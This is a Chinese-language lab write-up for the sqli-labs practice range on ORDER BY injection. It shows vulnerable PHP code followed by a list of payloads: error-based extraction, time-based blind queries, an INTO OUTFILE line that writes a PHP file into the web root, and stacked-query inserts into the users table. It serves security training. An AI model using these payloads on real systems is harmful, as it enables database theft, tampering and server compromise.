sqli-labs靶场(7)排序注入

1
2
3
4

$id=$_GET['sort'];	
...
	$sql = "SELECT * FROM users ORDER BY $id";
	$result = mysql_query($sql);

1

?sort=(extractvalue(1,concat(0x7e,(select user()),0x7e)))#

1

?sort= 1 and sleep(5)

1
2
3

?sort=1 into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-46\\shell.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

#十六进制的  <?php phphinfo();?>

1

1' and (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a) b)--+

1

Less-46中，我们没有用注释符注释尾部是因为他是数字型，且注入的位置在 SQL 语句尾部，而字符型就必须注释，否则无法进行单引号的正常闭合

1

1' and if(ascii(mid(database(),1,1))=115,1,sleep(1))--+

1
2

(select 1 from (select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a) b)
1 and (updatexml(1,concat(0x7e,(select database())),0)) 

1

1;insert into users(id,username,password) values(50,'Less50','123456')--+

1
2

1' and (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a) b)--+
1';insert into users values(51,'Less51','Less51')--+

1

1;insert into users(id,username,password) values(52,'Less52','123456')--+